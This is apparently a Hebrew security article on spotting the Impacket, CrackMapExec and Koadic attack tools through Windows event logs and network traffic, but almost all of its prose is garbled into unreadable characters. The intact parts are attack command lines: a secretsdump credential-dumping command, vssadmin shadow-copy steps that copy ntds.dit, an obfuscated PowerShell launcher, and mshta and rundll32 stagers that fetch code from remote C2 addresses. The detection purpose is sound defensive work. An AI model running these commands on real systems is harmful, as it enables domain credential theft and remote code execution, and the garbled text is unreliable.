ืืกืคืจ ืืชืงืืคืืช ืืืืืจ ืืืจืืื ื ืืื ืืื ืฉื ื: ืืืฉื
ืจืืื ืืฆืืื ืฉืืืื ืืื ืืื ื ืืฉืืฉืื ืืืืืจื ืจืืฉืื ืืช, ืืื ืืคืืชืื ืืชืงืคื ืืชืื ืืชืฉืชืืช. ืืชืืงืคืื ืืฉืชืืฉืื ืืื ืืฉืืืื ืฉืื ืื ืฉื ืืืชืงืคื ืืขืงืืืช ืืืืจืช ืืืืงืฃ. ืืช ืื, ืืื, ืงืฉื ืืืืืช ืืืจืื ืจืง ืืขืืจืช ืืื ืืืืืื
ืื ืฉืืืื ื ืฆืจืืืื ืืขืฉืืช:
- ืืื ืืืฆื ืคืืขืืื ืืื ืคืจืืฆื. ืืื ืื ืืชืืงืคืื ืฆืจืืืื ืื ืฆื ืืืืืื ืืื ืืืืืืืช ืื ืืืืืื ืืืฉืชืืฉ.
- ืืฆื ืืช ืื ืฉืื ืืืืื ืขื ืืื ืืื ืืืืืช ืืืืข ืืฉืืืื ืืจืืฉืื ืื ืฉื ืืชืงืคื. ื ืืชื ืืืื ืขื ืฉืื ืืกืืืจ, ืืื ืื ืืืื ืฉืืชืืงืฃ ืืื ืชืืงืฃ ืคื ืืื, ืื ืืืื ืฉืืชืืงืฃ ืื ืฆื ืืืจ ืืชืฉืชืืช ืฉืื ืืื ืืืืข ืงืืื ืืื. ืื ืืืคื ืืืืืช ืืคืฉืจื ืืฉืืืจ ืืช ืื ืฉืจืฉืจืช ืคืขืืืืชืื, ืืืืื ืืจืฆืื ืืืืืช ืชื ืืขื ื ืืกืคืช.
- ืืกืจ ืชืืฆืืืช ืืืืืืืช ืืืืืืช ืืืื ืืืืื ืืืืจื. ืืกืืจ ืืฉืืื ืฉืืืฉืจ ืคืขืืืืช ืืกืืืืืช ืืชืืืืช ืขื ืืกืืก ืกืืืจ ืืืื, ืชืืชืื ืืขืืืืช ืชืืืคืืช. ืืืจื ืืื ืืชืฉืชืืช ืืฉ ืืกืคืจ ืืกืคืืง ืฉื ืืจืืื, ืฉืื ื ืืชื ืืืืืื ืืืืืืืืืืืช ืืืื ืจืืฉืื, ืืืฉืื ืืืืข ืืืฉืื.
ืื ืืืืื ืืืื ื ืืชื ืื ืืชืืงืคืื? ืื ืื Impacket, ืื ืืชืืงืคืื ืืงืืืื ืกืคืจืืื ืืืืื ืฉื ืืืืืืื ืฉื ืืชื ืืืฉืชืืฉ ืืื ืืฉืืืื ืฉืื ืื ืฉื ืืืชืงืคื ืฉืืืืื ืืืืจ ืคืจืืฆืช ืืืืงืฃ. ืืืื ืจืืื ืืฉืชืืฉืื ืืืืืืื Impacket ืืืืคื ืคื ืืื - ืืืืืื, Metasploit. ืืฉ ืื dcomexec ื-wmiexec ืืืืฆืืข ืคืงืืืืช ืืจืืืง, secretsdump ืืงืืืช ืืฉืืื ืืช ืืืืืืจืื ืฉืืชืืืกืคืื ื-Impacket. ืืชืืฆืื ืืื, ืืืืื ื ืืื ืฉื ืคืขืืืืช ืกืคืจืืื ืืื ืืืืื ืืืืื ืฉื ื ืืืจืืช.
ืื ืื ืืงืจื ืฉืืืืฆืจืื ืืชืื ืืช "Powered by Impacket" ืขื CrackMapExec (ืื ืคืฉืื CME). ืื ืืกืฃ, ื-CME ืืฉ ืคืื ืงืฆืืื ืืืืช ืืืื ื ืขืืืจ ืชืจืืืฉืื ืคืืคืืืจืืื: Mimikatz ืืืฉืืช ืกืืกืืืืช ืื ืืืืืืืื ืฉืืื, ืืืืขืช Meterpreter ืื ืกืืื Empire ืืืืฆืืข ืืจืืืง, ื-Bloodhound ืขื ืืกืืคืื.
ืืืื ืืฉืืืฉื ืฉืืืจื ื ืืื Koadic. ืืื ืื ืขืืื ื, ืืื ืืืฆื ืืื ืก ืืืงืจืื ืืืื ืืืืื DEFCON 25 ืืฉื ืช 2017 ืืืื ื ืืื ืืืืฉื ืื ืกืื ืืจืืืช: ืืื ืคืืขื ืืืืฆืขืืช HTTP, Java Script ื-Microsoft Visual Basic Script (VBS). ืืืฉื ืื ื ืงืจืืช ืืืืืช ืืืืฅ ืืืืื: ืืืื ืืฉืชืืฉ ืืกื ืฉื ืชืืืช ืืกืคืจืืืช ืืืืื ืืช ื-Windows. ืืืืฆืจืื ืงืืจืืื ืืื COM Command & Control, ืื C3.
IMPACKET
ืืคืื ืงืฆืืื ืืืืช ืฉื Impacket ืจืืื ืืืื, ืืื ืืกืืืจ ืืชืื AD ืืืืกืืฃ ื ืชืื ืื ืืฉืจืชื MS SQL ืคื ืืืืื, ืืขื ืืืื ืืงืืช ืืืฉืืช ืืืฉืืจืื: ืืืื ืืชืงืคืช ืืืกืจ SMB, ืืืฉืืช ืืงืืืฅ ntds.dit ืืืืื ืืืืื ืฉื ืกืืกืืืืช ืืฉืชืืฉ ืืืงืจ ืชืืื. Impacket ืื ืืืฆืขืช ืคืงืืืืช ืืจืืืง ืืืืฆืขืืช ืืจืืข ืฉืืืืช ืฉืื ืืช: WMI, Windows Scheduler Management Service, DCOM ื-SMB, ืืืืจืฉ ืืืฉืืจืื ืืฉื ืื.
Secretsdump
ืืืื ื ืกืชืื ืขื secretsdump. ืืื ืืืืื ืฉืืืื ืืืืื ืื ืืืืื ืืช ืืฉืชืืฉ ืืื ืืืงืจื ืชืืื. ื ืืชื ืืืฉืชืืฉ ืื ืืื ืืืฉืื ืขืืชืงืื ืฉื ืืืืจื ืืืืจืื LSA, SAM, SECURITY, NTDS.dit, ืื ืฉื ืืชื ืืจืืืช ืืืชื ืืฉืืืื ืฉืื ืื ืฉื ืืืชืงืคื. ืืฉืื ืืจืืฉืื ืืคืขืืืช ืืืืืื ืืื ืืืืืช ืืืืฆืขืืช SMB, ืืืฆืจืื ืืช ืืกืืกืื ืฉื ืืืฉืชืืฉ ืื ื-hash ืฉืื ืืื ืืืฆืข ืืืืืืืืช ืืช ืืชืงืคืช Pass the Hash. ืืืืจ ืืื ืืืืขื ืืงืฉื ืืคืชืื ืืืฉื ื-Service Control Manager (SCM) ืืืงืื ืืืฉื ืืจืืฉืื ืืืืฆืขืืช ืคืจืืืืงืื winreg, ืืืืฆืขืืชื ืืืื ืชืืงืฃ ืืืืืช ืืช ืื ืชืื ืื ืฉื ืขื ืคื ืขื ืืื ืืืงืื ืชืืฆืืืช ืืืืฆืขืืช SMB.
ืืืืืจ. 1 ืื ื ืจืืืื ืืืฆื ืืืืืง ืืขืช ืฉืืืืฉ ืืคืจืืืืงืื winreg, ืืืืฉื ืืชืงืืืช ืืืืฆืขืืช ืืคืชื ืจืืฉืื ืขื LSA. ืืฉื ืื, ืืฉืชืืฉ ืืคืงืืื DCERPC ืขื opcode 15 - OpenKey.
ืืืจื. 1. ืคืชืืืช ืืคืชื ืจืืฉืื ืืืืฆืขืืช ืคืจืืืืงืื winreg
ืืืืจ ืืื, ืืืฉืจ ืืชืงืืืช ืืืฉื ืืืคืชื, ืืขืจืืื ื ืฉืืจืื ืขื ืืคืงืืื SaveKey ืขื opcode 20. Impacket ืขืืฉื ืืืช ืืฆืืจื ืืืื ืกืคืฆืืคืืช. ืื ืฉืืืจ ืืช ืืขืจืืื ืืงืืืฅ ืฉืฉืื ืืื ืืืจืืืช ืฉื 8 ืชืืืื ืืงืจืืืื ืืืฆืืจืคืื ื-.tmp. ืื ืืกืฃ, ืืขืืื ื ืืกืคืช ืฉื ืงืืืฅ ืื ืืชืจืืฉืช ืืืืฆืขืืช SMB ืืกืคืจืืืช System32 (ืืืืจ 2).
ืืืจื. 2. ืชืืื ืืช ืืงืืืช ืืคืชื ืจืืฉืื ืืืืฉื ืืจืืืง
ืืกืชืืจ ืฉื ืืชื ืืืืืช ืคืขืืืืช ืืื ืืจืฉืช ืขื ืืื ืฉืืืืชืืช ืืกื ืืคื ืจืืฉืื ืืกืืืืื ืืืืฆืขืืช ืคืจืืืืงืื winreg, ืฉืืืช ืกืคืฆืืคืืื, ืคืงืืืืช ืืกืืจื.
ืืืืื ืื ืื ืืฉืืืจ ืขืงืืืช ืืืืื ืืืืจืืขืื ืฉื Windows, ืื ืฉืืงื ืขื ืืืืืื. ืืืฉื, ืืชืืฆืื ืืืืฆืืข ืืคืงืืื
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
ืืืืื Windows Server 2016 ื ืจืื ืืช ืจืฆืฃ ืืืืจืืขืื ืืืคืชื ืืื:
1. 4624 - ืื ืืกื ืืจืืืง.
2. 5145 - ืืืืงืช ืืืืืืช ืืืฉื ืืฉืืจืืช ืืจืืืง winreg.
3. 5145 - ืืืืงืช ืืืืืืช ืืืฉื ืืงืืฆืื ืืกืคืจืืืช System32. ืืงืืืฅ ืืฉ ืืช ืืฉื ืืืงืจืื ืฉืืืืืจ ืืขืื.
4. 4688 - ืืฆืืจืช ืชืืืื cmd.exe ืฉืืคืขืื ืืช vssadmin:
โC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ืืฆืืจืช ืชืืืื ืขื ืืคืงืืื:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - ืืฆืืจืช ืชืืืื ืขื ืืคืงืืื:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - ืืฆืืจืช ืชืืืื ืขื ืืคืงืืื:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
Smbexec
ืืื ืืืื ืจืืื ืืืืจ ื ืืฆืื, ื-Impacket ืืฉ ืืืืืืื ืืืืฆืืข ืคืงืืืืช ืืจืืืง. ื ืชืืงื ื-smbexec, ืืืกืคืงืช ืืขืืคืช ืคืงืืื ืืื ืืจืืงืืืืืช ืืืืฉื ืืจืืืง. ืืืืื ืื ืืืจืฉ ืื ืืืืืช ืืืืฆืขืืช SMB, ืื ืขื ืกืืกืื ืื hash ืฉื ืกืืกืื. ืืืืืจ. ืืืืืจ 3 ืื ื ืจืืืื ืืืืื ืืืืคื ืฉืื ืคืืขื ืืื ืืื, ืืืงืจื ืื ืืืืืจ ืืืกืืฃ ืืื ืื ืืืงืืื.
ืืืจื. 3. ืงืื ืกืืืช smbexec ืืื ืืจืืงืืืืืช
ืืฉืื ืืจืืฉืื ืฉื smbexec ืืืืจ ืืืืืืช ืืื ืคืชืืืช ื-SCM ืขื ืืคืงืืื OpenSCManagerW (15). ืืฉืืืืชื ืืืืืช: ืืฉืื MachineName ืืื DUMMY.
ืืืจื. 4. ืืงืฉ ืืคืชืื ืืช ืื ืื ืืงืจืช ืืฉืืจืืช
ืืืืจ ืืื, ืืฉืืจืืช ื ืืฆืจ ืืืืฆืขืืช ืืคืงืืื CreateServiceW (12). ืืืงืจื ืฉื smbexec, ืื ื ืืืืืื ืืจืืืช ืืช ืืืชื ืืืืืื ืื ืืืช ืคืงืืื ืืื ืคืขื. ืืืืืจ. 5 ืืจืืง ืืฆืืื ืคืจืืืจื ืคืงืืื ืืืชื ื ืืชื ืื ืืฉืื ืื, ืฆืืื ืืฆืืื ืื ืืชืืงืฃ ืืืื ืืฉื ืืช. ืงื ืืจืืืช ืฉื ืืชื ืืฉื ืืช ืืช ืืฉื ืฉื ืงืืืฅ ืืืคืขืื, ืืกืคืจืืื ืฉืื ืืงืืืฅ ืืคืื, ืืื ืืช ืืฉืืจ ืืจืื ืืืชืจ ืงืฉื ืืฉื ืืช ืืืื ืืืคืจืืข ืืืืืืื ืฉื ืืืืื ื-Impacket.
ืืืจื. 5. ืืงืฉ ืืืฆืืจ ืฉืืจืืช ืืืืฆืขืืช Service Control Manager
Smbexec ืื ืืฉืืืจ ืขืงืืืช ืืจืืจืื ืืืืื ืืืืจืืขืื ืฉื Windows. ืืืืื Windows Server 2016 ืขืืืจ ืืขืืคืช ืืคืงืืื ืืืื ืืจืืงืืืืืช ืขื ืืคืงืืื ipconfig, ื ืจืื ืืช ืจืฆืฃ ืืืืจืืขืื ืืืคืชื ืืื:
1. 4697 - ืืชืงื ืช ืืฉืืจืืช ืืืืฉืืจ ืฉื ืืงืืจืื:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - ืืฆืืจืช ืชืืืื cmd.exe ืขื ืืืจืืืื ืืื ืื ืงืืื 1.
3. 5145 - ืืืืงืช ืืืืืืช ืืืฉื ืืงืืืฅ __output ืืกืคืจืืืช C$.
4. 4697 - ืืชืงื ืช ืืฉืืจืืช ืืืืื ื ืฉื ืื ืคืืข.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ืืฆืืจืช ืชืืืื cmd.exe ืขื ืืืจืืืื ืืื ืื ืงืืื 4.
6. 5145 - ืืืืงืช ืืืืืืช ืืืฉื ืืงืืืฅ __output ืืกืคืจืืืช C$.
Impacket ืืื ืืืกืืก ืืคืืชืื ืืื ืชืงืืคื. ืืื ืชืืื ืืืขื ืืื ืืคืจืืืืงืืืื ืืชืฉืชืืช Windows ืืื ืืืื ืืฉ ืื ืชืืื ืืช ืืืคืืื ืืืช ืืฉืื. ืื ื ืืงืฉืืช ืกืคืฆืืคืืืช ืฉื Winreg, ืืืฉืืืืฉ ื- SCM API ืขื ืืฆืืจืช ืคืงืืืืช ืืืคืืื ืืช, ืืคืืจืื ืฉื ืืงืืืฅ, ืืฉืืชืืฃ SMB SYSTEM32.
CRACKMAPEXEC
ืืื ื-CME ื ืืขื ืืขืืงืจ ืืืฆืข ืืืืืืฆืื ืฉื ืคืขืืืืช ืฉืืจืชืืืช ืฉืชืืงืฃ ืฆืจืื ืืืฆืข ืืื ืืืชืงืื ืืชืื ืืจืฉืช. ืื ืืืคืฉืจ ืื ืืขืืื ืืฉืืชืืฃ ืขื ืกืืื ืืืืืคืจืื ืืืืืข ืืืืจืคืจืืจ. ืืื ืืืฆืข ืคืงืืืืช ืืืืคื ืกืืื, CME ืืืื ืืืฉืืฉ ืืืชื. ืืืืฆืขืืช Bloodhound (ืืื ืกืืืจ ื ืคืจื), ืชืืงืฃ ืืืื ืืืคืื ืืช ืืืืคืืฉ ืืืืืืืื ืฉื ืืคืขืืช ืื ืื ืืืืืื ืคืขืืื.
ืึถึผืึถื ืึดืฉืืึผืฉื
Bloodhound, ืืืื ืขืฆืืื, ืืืคืฉืจ ืกืืืจ ืืชืงืื ืืชืื ืืจืฉืช. ืืื ืืืกืฃ ื ืชืื ืื ืขื ืืฉืชืืฉืื, ืืืื ืืช, ืงืืืฆืืช, ืืคืขืืืช ืืืกืืคืง ืืกืงืจืืคื PowerShell ืื ืงืืืฅ ืืื ืืจื. ืคืจืืืืงืืืื ืืืืกืกื LDAP ืื SMB ืืฉืืฉืื ืืืืกืืฃ ืืืืข. ืืืืื ืืืื ืืืจืฆืื CME ืืืคืฉืจ ืืืจืื ืฉื Bloodhound ืืืืฉื ืฉื ืืงืืจืื, ืืืจืืฅ ืืืงืื ืืช ืื ืชืื ืื ืฉื ืืกืคื ืืืืจ ืืืืฆืืข, ืืืื ืืืคืื ืคืขืืืืช ืืืขืจืืช ืืืืืืืืืืช ืืืืคืื ืืืชื ืืคืืืช ืืืืืืช. ืืงืืืคื ืืืจืคืืช ืฉื Bloodhound ืืฆืืื ืืช ืื ืชืื ืื ืฉื ืืกืคื ืืฆืืจื ืฉื ืืจืคืื, ืืืืคืฉืจืื ืื ืืืฆืื ืืช ืืืจื ืืงืฆืจื ืืืืชืจ ืืืืืฉื ืฉื ืืชืืงืฃ ืืื ืื ืืืืืืื.
ืืืจื. 6. ืืืฉืง Bloodhound
ืืื ืืจืืฅ ืขื ืืืืฉื ืฉื ืืงืืจืื, ืืืืืื ืืืฆืจ ืืฉืืื ืืืืฆืขืืช ATSVC ื-SMB. ATSVC ืืื ืืืฉืง ืืขืืืื ืขื ืืชืืื ืืืฉืืืืช ืฉื Windows. CME ืืฉืชืืฉ ืืคืื ืงืฆืืืช NetrJobAdd(1) ืฉืื ืืื ืืืฆืืจ ืืฉืืืืช ืืจื ืืจืฉืช. ืืืืื ืืื ืฉืืืืื CME ืฉืืื ืืืฆืืช ืืืืืจ. 7: ืืืื ืงืจืืืช ืคืงืืื cmd.exe ืืงืื ืืขืืจืคื ืืฆืืจื ืฉื ืืจืืืื ืืื ืืคืืจืื XML.
ืืืืจ.7. ืืฆืืจืช ืืฉืืื ืืืืฆืขืืช CME
ืืืืจ ืฉืืืฉืืื ืืืืฉื ืืืืฆืืข, ืืืืื ื ืฉื ืืงืืจืื ืืคืขืืื ืืช Bloodhound ืืขืฆืื, ืื ืืชื ืืจืืืช ืืืช ืืชื ืืขื. ืืืืืื ืืืืคืืื ืืฉืืืืชืืช LDAP ืืืฉืืช ืงืืืฆืืช ืกืื ืืจืืืืช, ืจืฉืืื ืฉื ืื ืืืืื ืืช ืืืืฉืชืืฉืื ืืืืืืื, ืืงืืืช ืืืืข ืขื ืืคืขืืืช ืืฉืชืืฉ ืคืขืืืืช ืืืืฆืขืืช ืืงืฉืช SRVSVC NetSessEnum.
ืืืจื. 8. ืืฉืืช ืจืฉืืื ืฉื ืืคืขืืืช ืคืขืืืืช ืืืืฆืขืืช SMB
ืื ืืกืฃ, ืืฉืงืช Bloodhound ืืืืื ื ืฉื ืงืืจืื ืขื ืืืืืืื ื ืืืคืขืืช ืืืืื ืืืืจืืข ืขื ืืืื 4688 (ืืฆืืจืช ืชืืืื) ืืฉื ืืชืืืื ยซC:WindowsSystem32cmd.exeยป
. ืื ืฉืืืื ืื ืื ืืืืขืื ืื ืฉื ืฉืืจืช ืืคืงืืื:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , โฆ , 40,41 )-jOIN'' ) "
Enum_avproducts
ืืืืื enum_avproducts ืืขื ืืื ืืืื ืื ืงืืืช ืืื ืฉื ืคืื ืงืฆืืื ืืืืช ืืืืฉืื. WMI ืืืคืฉืจ ืื ืืืฉืชืืฉ ืืฉืคืช ืืฉืืืืชื WQL ืืื ืืืืืจ ื ืชืื ืื ืืืืืืืงืืื ืฉืื ืื ืฉื Windows, ืืื ืืขืฆื ืื ืฉืืืืื CME ืื ืืฉืชืืฉ ืื. ืืื ืืืืฆืจ ืฉืืืืชืืช ืืืืืงืืช AntiSpywareProduct ื- AntiะirusProduct ืืืื ืืื ืืืื ื ืืืืชืงื ืื ืืืืฉื ืฉื ืืงืืจืื. ืขื ืื ืช ืืืฉืื ืืช ืื ืชืื ืื ืืืจืืฉืื, ืืืืืื ืืชืืืจ ืืืจืื ืืฉืืืช rootSecurityCenter2, ืืื ืืืฆืจ ืฉืืืืชืช WQL ืืืงืื ืชืืืื. ืืืืืจ. ืืืืจ 9 ืืฆืื ืืช ืืชืืื ืฉื ืืงืฉืืช ืืชืืืืืช ืืืื. ืืืืืื ืฉืื ื, Windows Defender ื ืืฆื.
ืืืจื. 9. ืคืขืืืืช ืจืฉืช ืฉื ืืืืื enum_avproducts
ืืขืชืื ืงืจืืืืช, ืืืงืืจืช WMI (Trace WMI-Activity), ืฉืืืืจืืขืื ืฉืื ืชืืื ืืืฆืื ืืืืข ืฉืืืืฉื ืขื ืฉืืืืชืืช WQL, ืขืฉืืื ืืืืืช ืืืฉืืชืช. ืืื ืื ืื ืืืคืขื, ืื ืื ืืกืงืจืืคื enum_avproducts ืืืคืขื, ืืืฉืืจ ืืืจืืข ืขื ืืืื 11. ืืื ืืืื ืืช ืฉื ืืืฉืชืืฉ ืฉืฉืื ืืช ืืืงืฉื ืืืช ืืฉื ืืืจืื ืืฉืืืช rootSecurityCenter2.
ืืื ืืื ืืืืืืื ื-CME ืืื ืืคืฆืื ืืฉืื, ืืื ืื ืื ืฉืืืืชืืช WQL ืกืคืฆืืคืืืช ืื ืืฆืืจื ืฉื ืกืื ืืกืืื ืฉื ืืืืืช ืืืชืืื ืืฉืืืืช ืขื ืขืจืคืื ืืคืขืืืืช ืกืคืฆืืคืืช ื-Bloodhound ื-LDAP ื-SMB.
KOADIC
ืืืคืืื ืืืืืื ืฉื Koadic ืืื ืืฉืืืืฉ ืืืคืจืฉื JavaScript ื-VBScript ืืืืื ืื ื-Windows. ืืืืื ืื, ืืื ืขืืงื ืืืจ ืืืืช ืืืืื ืืืืฅ ืืืืื - ืืืืืจ, ืืื ืื ืชืืืช ืืืฆืื ืืช ืืืฉืชืืฉ ืืืื Windows ืกืื ืืจืืืื. ืืื ืืื ืืฉืืืื ืืืงืจื ืืืื (CnC), ืฉืื ืืืืจ ืืืืืงื ืืืชืงื "ืฉืชื" ืขื ืืืืื ื, ืืืืคืฉืจ ืืฉืืื ืื. ืืืื ื ืืื, ืืืจืืื ืืืืืื ืงืืืืืช, ื ืงืจืืช "ืืืืื". ืื ืืื ืืกืคืืง ืืจืฉืืืช ืืชืคืขืื ืืื ืืฆื ืฉื ืืงืืจืื, ื-Koadic ืืฉ ืืช ืืืืืืช ืืืขืืืช ืืืชื ืืืืฆืขืืช ืืื ืืงืืช ืืขืงืฃ ืฉื ืืงืจืช ืืฉืชืืฉ (UAC bypass).
ืืืจื. 10. Koadic Shell
ืขื ืื ืคืืข ืืืืื ืชืงืฉืืจืช ืขื ืฉืจืช ืืคืืงืื ืืืืงืจื. ืืื ืืขืฉืืช ืืืช, ืืื ืฆืจืืื ืืืฆืืจ ืงืฉืจ ืขื URI ืฉืืืื ืงืืื ืืืงืื ืืช ืืืืฃ Koadic ืืจืืฉื ืืืืฆืขืืช ืืื ืืืกืืืื'ืจืื. ืืืืืจ. ืืืืจ 11 ืืฆืื ืืืืื ื-mshta stager.
ืืืจื. 11. ืืชืืื ืืคืขืื ืขื ืฉืจืช CnC
ืืืชืืกืก ืขื ืืฉืชื ื ืืชืืืื WS, ืืชืืจืจ ืฉืืืืฆืืข ืืชืจืืฉ ืืจื WScript.Shell, ืืืืฉืชื ืื STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ืืืืืื ืืืืข ืืคืชื ืขื ืืคืจืืืจืื ืฉื ืืืคืขืื ืื ืืืืืช. ืืื ืฆืื ืืืงืฉื-ืชืืืื ืืจืืฉืื ืืืืืืจ HTTP ืขื ืฉืจืช CnC. ืืงืฉืืช ืขืืงืืืช ืงืฉืืจืืช ืืฉืืจืืช ืืคืื ืงืฆืืื ืืืืช ืฉื ืืืืืืืื ืื ืงืจืืื (ืฉืชืืื). ืื ืืืืืืืื ืฉื Koadic ืขืืืืื ืจืง ืขื ืืคืขืื ืคืขืืื ืขื CnC.
ืืืืืงืฅ
ืืืืืง ืืื ืฉ-CME ืขืืื ืขื Bloodhound, Koadic ืขืืื ืขื Mimikatz ืืชืืื ืืช ื ืคืจืืช ืืืฉ ืื ืืกืคืจ ืืจืืื ืืืฉืืง ืืืชื. ืืืื ืฆืื ืืงืฉื-ืชืืืื ืืืืจืืช ืฉืชื Mimikatz.
ืืืจื. 12. ืืขืืจ ืืช ืืืืืงืฅ ืืงืืืืืฅ'
ืืชื ืืืื ืืจืืืช ืืืฆื ืืฉืชื ื ืคืืจืื URI ืืืงืฉื. ืืขืช ืืื ืืืื ืขืจื ืขืืืจ ืืืฉืชื ื csrf, ืฉืืืจืื ืืืืืื ืฉื ืืืจ. ืื ืชืฉืื ืื ืืฉืื; ืืืื ื ืืืืขืื ืฉ-CSRF ืืืื ืืืจื ืืื ืืืจืช. ืืชืืืื ืืืืชื ืืืชื ืืืฃ ืขืืงืจื ืฉื Koadic, ืฉืืืื ื ืืกืฃ ืงืื ืืงืฉืืจ ืืืืืืงืฅ. ืืื ืื ืืืื, ืื ืืืื ื ืกืชืื ืขื ื ืงืืืืช ืืืคืชื. ืืื ืืฉ ืื ื ืืช ืกืคืจืืืช Mimikatz ืืงืืืืช ื-base64, ืืืืงื NET ืืกืืืจืช ืฉืชืืืืจ ืืืชื, ืืืืขืื ืื ืืืคืขืืช Mimikatz. ืชืืฆืืช ืืืืฆืืข ืืืขืืจืช ืืจืฉืช ืืืงืกื ืืจืืจ.
ืืืจื. 13. ืชืืฆืื ืฉื ืืคืขืืช Mimikatz ืขื ืืืื ื ืืจืืืงืช
Exec_cmd
ื-Koadic ืืฉ ืื ืืืืืืื ืฉืืืืืื ืืืฆืข ืคืงืืืืช ืืจืืืง. ืืื ื ืจืื ืืช ืืืชื ืฉืืืช ืืฆืืจืช URI ืืืช ืืฉืชื ื ื-sid ืื-csrf ืืืืืจืื. ืืืงืจื ืฉื ืืืืื exec_cmd, ื ืืกืฃ ืงืื ืืืืฃ ืืืกืืื ืืืฆืข ืคืงืืืืช ืืขืืคืช. ืืืื ืืืฆื ืงืื ืืื ืืืืื ืืชืืืืช HTTP ืฉื ืฉืจืช CnC.
ืืืจื. 14. ืงืื ืืฉืชืื exec_cmd
ืืืฉืชื ื GAWTUUGCFI ืขื ืชืืื ืช WS ืืืืืจืช ื ืืจืฉ ืืืืฆืืข ืงืื. ืืขืืจืชื, ืืฉืชื ืงืืจื ืืืขืืคืช, ืืืขืื ืฉื ื ืขื ืคื ืงืื - shell.exec ืขื ืืืืจืช ืืจื ืื ืชืื ืื ืืคืื ื-shell.run ืืืื ืืืืืจ.
Koadic ืืื ื ืืื ืืืคืืกื, ืื ืืฉ ืื ืืคืฆืื ืืฉืื ืฉืืืืฆืขืืชื ื ืืชื ืืืฆืื ืืืชื ืืชื ืืขื ืืืืืืืืช:
- ืืืืืฆืจืืช ืืืืืืช ืฉื ืืงืฉืืช HTTP,
- ืืืืฆืขืืช winHttpRequests API,
- ืืฆืืจืช ืืืืืืงื WScript.Shell ืืืืฆืขืืช ActiveXObject,
- ืืืฃ ืืืื ืืืืฆืืข.
ืืืืืืจ ืืจืืฉืื ื ืืชืืฆืข ืขื ืืื ื-stageer, ืื ืฉื ืืชื ืืืืืช ืืช ืคืขืืืืชื ืืจื ืืืจืืขื Windows. ืขืืืจ mshta, ืืื ืืืจืืข 4688, ืืืฆืืื ืืฆืืจืช ืชืืืื ืขื ืชืืื ืช ืืืชืืื:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
ืืืื ืฉ-Koadic ืคืืขื, ืืชื ืืืื ืืจืืืช ืืืจืืขืื ืืืจืื ืฉื 4688 ืขื ืชืืื ืืช ืืืืคืืื ืืช ืืืชื ืืฆืืจื ืืืฉืืืช:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
ืืืฆืืื
ืืจื ื ืืืืื ืืืงืจืงืข ืฆืืืจ ืคืืคืืืจืืืช ืืงืจื ืคืืฉืขืื. ืื ืืฉืชืืฉืื ืืืืื ืืืื ืื ืื ืื ืืืืื ืื ื-Windows ืืฆืจืืืื. ืื ื ืจืืืื ืืืื ืคืืคืืืจืืื Koadic, CrackMapExec ื-Impacket ืืขืืงืืื ืืืจ ืขืืงืจืื ืื ืืืคืืขืื ืืืชืจ ืืืืชืจ ืืืืืืช APT. ืื ืืกืคืจ ืืืืืืื ื-GitHub ืขืืืจ ืืืืื ืืืื ืืืื ืืืื, ืืฆืฆืื ืืืฉืื (ืืืจ ืืฉ ืืืืฃ ืืืื ืขืืฉืื). ืืืจื ื ืฆืืืจ ืคืืคืืืจืืืช ืืฉื ืืคืฉืืืช ืฉืื: ืืชืืงืคืื ืืื ื ืืงืืงืื ืืืื ืฆื ืฉืืืฉื; ืื ืืืจ ื ืืฆืืื ืขื ืืืืฉืืื ืฉื ืืงืืจืื ืืช ืืขืืืจืื ืืื ืืขืงืืฃ ืืืฆืขื ืืืืื. ืื ื ืืชืืงืืื ืืืืืื ืชืงืฉืืจืช ืจืฉืช: ืื ืืื ืฉืชืืืจ ืืขืื ืืฉืืืจ ืขืงืืืช ืืฉืื ืืชืขืืืจืช ืืจืฉืช; ืืืงืจ ืืคืืจื ืฉืืื ืืคืฉืจ ืื ื ืืืื ืืช ืืืืฆืจ ืฉืื ื
ืืืืจืื:
